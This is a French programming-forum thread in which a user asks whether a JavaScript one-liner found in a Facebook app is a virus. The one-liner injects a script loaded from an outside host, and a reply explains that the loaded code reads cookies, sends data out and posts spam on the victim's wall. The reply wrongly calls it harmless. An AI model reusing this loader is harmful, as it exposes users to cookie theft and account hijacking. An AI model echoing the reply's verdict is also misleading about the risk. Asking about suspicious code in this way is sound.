IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

JavaScript Discussion :

expliquer ce code


Sujet :

JavaScript

  1. #1
    Nouveau Candidat au Club
    Inscrit en
    Novembre 2010
    Messages
    126
    Détails du profil
    Informations forums :
    Inscription : Novembre 2010
    Messages : 126
    Points : 0
    Points
    0
    Par défaut expliquer ce code
    Bonjour,

    j'ai trouvé ce code sur une application sur facebook
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    javascript:(function(){_ccscr=document.createElement('SCRIPT');_ccscr.type='text/javascript';_ccscr.src='http://savilart.com/o.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

    est ce que c'est un virus ?

    Merci.

  2. #2
    Membre confirmé Avatar de humitake
    Homme Profil pro
    Étudiant
    Inscrit en
    Novembre 2010
    Messages
    399
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 33
    Localisation : France

    Informations professionnelles :
    Activité : Étudiant

    Informations forums :
    Inscription : Novembre 2010
    Messages : 399
    Points : 578
    Points
    578
    Par défaut
    Je ne pense pas que ce soit un virus, le code renvoyé se contente de lire les cookies et d'envoyer / récupérer des données sur plusieurs site web.
    A mon avis sa ne te permet pas de voir qui a vu ton profil sa doit être juste pour récupérer quelques informations. Et je pense qu' il poste un message sur ton mur :
    var postmessage = "%tf% %tf% %tf% %tf% Vous les gars regarde mon profil le plus aujourd hui! Voir qui ont regarde le votre @ http://savilart.com/haifa";

  3. #3
    Membre émérite

    Profil pro
    Inscrit en
    Mai 2008
    Messages
    1 576
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Mai 2008
    Messages : 1 576
    Points : 2 440
    Points
    2 440

Discussions similaires

  1. Comment expliquer ce code ?
    Par beegees dans le forum Langage
    Réponses: 2
    Dernier message: 03/11/2008, 18h12
  2. Réponses: 4
    Dernier message: 09/06/2008, 23h19
  3. Pouvez vous m'expliquer ce code ?
    Par sayfouche dans le forum C#
    Réponses: 6
    Dernier message: 09/04/2008, 23h36
  4. qui peux m'expliquer ce code ligne par ligne merci
    Par superuser dans le forum Débuter avec Java
    Réponses: 3
    Dernier message: 08/04/2008, 11h25
  5. Qui expliquer ce code pour moi?
    Par hack-77 dans le forum C
    Réponses: 3
    Dernier message: 22/03/2008, 10h32

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo